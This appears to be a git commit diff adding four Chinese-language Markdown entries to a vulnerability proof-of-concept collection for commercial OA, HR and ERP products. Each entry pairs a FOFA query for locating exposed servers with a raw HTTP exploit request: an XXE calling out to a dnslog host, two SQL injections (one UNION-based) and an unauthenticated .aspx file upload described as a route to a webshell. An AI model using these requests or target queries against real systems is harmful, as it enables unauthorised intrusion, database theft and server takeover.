保存本地添加的md文件

九思OA/九思OA接口WebServiceProxy存在XXE漏洞.md

@@ -0,0 +1,25 @@
+# 九思OA接口WebServiceProxy存在XXE漏洞
+
+九思OA接口isoaNebServiceProxy 存在XML实体注入漏洞，未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据。
+
+## fofa
+
+```yaml
+body="/jsoa/login.jsp"
+```
+
+## poc
+
+```java
+POST /jsoa/WebServiceProxy HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://11111.edbxqa.dnslog.cn"> %remote;]>
+```
+

同享人力管理管理平台/同享人力管理管理平台SFZService.asmx存在SQL注入漏洞.md

@@ -0,0 +1,25 @@
+# 同享人力管理管理平台SFZService.asmx存在SQL注入漏洞
+
+同享TXEHR人力管理管理平台SFZService.asmx存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+## fofa
+
+```yaml
+body="/Assistant/Default.aspx"
+```
+
+## poc
+
+```java
+POST /Service/SFZService.asmx
+HOST: 
+SOAPAction: http://tempuri.org/GetEmployeeBySFZ
+Content-Type: text/xml;charset=UTF-8
+
+<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\
+      \ xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n\
+      \      <tem:GetEmployeeBySFZ>\n         <!--type: string-->\n         <tem:strSFZ>1'\
+      \ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(81)+CHAR(78)+CHAR(79)+CHAR(122)+CHAR(106)+CHAR(69)+CHAR(103)+CHAR(80)+CHAR(87)+CHAR(89)+CHAR(117)+CHAR(97)+CHAR(104)+CHAR(105)+CHAR(74)+CHAR(109)+CHAR(80)+CHAR(68)+CHAR(74)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(103)+CHAR(90)+CHAR(68)+CHAR(105)+CHAR(114)+CHAR(107)+CHAR(69)+CHAR(86)+CHAR(121)+CHAR(76)+CHAR(69)+CHAR(115)+CHAR(102)+CHAR(81)+CHAR(76)+CHAR(105)+CHAR(101)+CHAR(74)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\
+      \ hExp</tem:strSFZ>\n      </tem:GetEmployeeBySFZ>\n   </soapenv:Body>\n</soapenv:Envelope>
+```
+

汇智ERP/汇智ERP系统Upload.aspx存在文件上传漏洞.md

@@ -0,0 +1,62 @@
+# 汇智ERP系统Upload.aspx存在文件上传漏洞
+
+汇智企业资源管理系统Upload.aspx存在文件上传漏洞，攻击者可未授权上传webshell木马文件获取服务器权限。
+
+## fofa
+
+```yaml
+icon_hash="-642591392"
+```
+
+## poc
+
+```java
+POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1
+Host: 
+Content-Length: 1033
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="__VIEWSTATE"
+
+/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
+
+573D6CFB
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfile_Input"
+
+
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfile_upload"; filename="1"
+Content-Type: image/jpeg
+
+<!DOCTYPE html>
+<html>
+<head>
+    <title>ASP.NET Web Forms Example</title>
+</head>
+<body>
+    <%@ Page Language="C#" %>
+    <% Response.Write("hello,world"); %>
+</body>
+</html>
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="upfilename"
+
+2.aspx
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk
+Content-Disposition: form-data; name="dnpostmethodname"
+
+uploadfile
+------WebKitFormBoundaryLkkAXATqVKBHZ8zk--
+```
+

超易企业管理系统/超易企业管理系统Login.ashx存在SQL注入漏洞.md

@@ -0,0 +1,27 @@
+# 超易企业管理系统Login.ashx存在SQL注入漏洞
+
+超易企业管理系统存在SQL注入漏洞，攻击者可获取数据库敏感信息。
+
+## fofa
+
+```yaml
+"超易企业管理系统"
+```
+
+## poc
+
+```java
+POST /ajax/Login.ashx?Date=%271721821198459%27 HTTP/1.1
+Host: 
+Content-Length: 92
+Accept: text/plain, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+username=admin*&password=admin123&loginguid=&logintype=pc
+```
+